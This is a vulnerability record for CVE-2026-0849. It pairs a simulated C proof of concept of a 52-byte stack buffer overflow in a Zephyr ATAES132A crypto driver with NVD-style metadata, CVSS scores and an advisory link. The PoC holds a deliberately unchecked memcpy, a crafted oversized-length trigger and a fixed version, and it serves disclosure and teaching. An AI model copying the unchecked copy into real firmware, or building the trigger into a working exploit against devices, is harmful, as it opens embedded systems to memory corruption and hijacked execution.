CVE-2026-0849

// CVE-2026-0849 PoC - Zephyr ATAES132A Buffer Overflow // This PoC demonstrates the buffer overflow condition in Zephyr crypto driver // when processing malformed ATAES132A responses #include <stdint.h> #include <string.h> #include <stdio.h> // Vulnerable function signature (simulating Zephyr driver behavior) void ataes132a_process_response_vulnerable(uint8_t* response) { // Stack buffer with fixed size of 52 bytes (as mentioned in CVE) uint8_t stack_buffer[52]; // Length field from response - NOT validated before use uint16_t length = (response[0] << 8) | response[1]; // Vulnerable: Direct copy without bounds checking // If length > 52, this causes stack buffer overflow memcpy(stack_buffer, response + 2, length); printf("Processed %d bytes\n", length); } // Proof of concept trigger void trigger_overflow() { // Craft malicious response with oversized length field uint8_t malicious_response[128]; // Length field: 100 bytes (exceeds 52-byte buffer) malicious_response[0] = 0x00; malicious_response[1] = 0x64; // 100 in decimal // Fill with overflow data (shellcode or ROP chain in real attack) memset(malicious_response + 2, 0x41, 100); // Fill with 'A' // Trigger vulnerable function ataes132a_process_response_vulnerable(malicious_response); } // Safe version with proper bounds checking void ataes132a_process_response_safe(uint8_t* response) { uint8_t stack_buffer[52]; uint16_t length = (response[0] << 8) | response[1]; // Fixed: Validate length before copy if (length > sizeof(stack_buffer)) { printf("ERROR: Length %d exceeds buffer size %zu\n", length, sizeof(stack_buffer)); return; // Reject oversized response } memcpy(stack_buffer, response + 2, length); printf("Processed %d bytes safely\n", length); } int main() { printf("CVE-2026-0849 PoC - Zephyr ATAES132A Buffer Overflow\n"); printf("==================================================\n\n"); printf("Testing vulnerable version:\n"); trigger_overflow(); printf("\nTesting safe version:\n"); uint8_t safe_response[128] = {0x00, 0x64}; memset(safe_response + 2, 0x41, 100); ataes132a_process_response_safe(safe_response); return 0; }

{"cve": {"id": "CVE-2026-0849", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:07.270", "lastModified": "2026-04-02T14:26:59.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malformed ATAES132A responses with an oversized length field overflow a 52-byte stack buffer in the Zephyr crypto driver, allowing a compromised device or bus attacker to corrupt kernel memory and potentially hijack execution."}, {"lang": "es", "value": "Respuestas ATAES132A malformadas con un campo de longitud sobredimensionado desbordan un búfer de pila de 52 bytes en el controlador criptográfico de Zephyr, permitiendo a un dispositivo comprometido o a un atacante del bus corromper la memoria del kernel y potencialmente secuestrar la ejecución."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.4, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zephyrproject:zephyr:4.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "EA3FCE94-ECC0-421B-B359-8AC2F4FF9589"}, {"vulnerable": true, "criteria": "cpe:2.3:o:zephyrproject:zephyr:4.3.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "A9F6045A-6985-43A5-A0C3-19CF4E3D0ACF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:zephyrproject:zephyr:4.3.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "F46D01CA-AD60-4A2F-91E0-44BDD4C6EDDA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:zephyrproject:zephyr:4.3.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "0A85B354-1551-4500-8775-CEFEE279579D"}]}]}], "references": [{"url": "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-ff4p-3ggg-prp6", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-ff4p-3ggg-prp6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}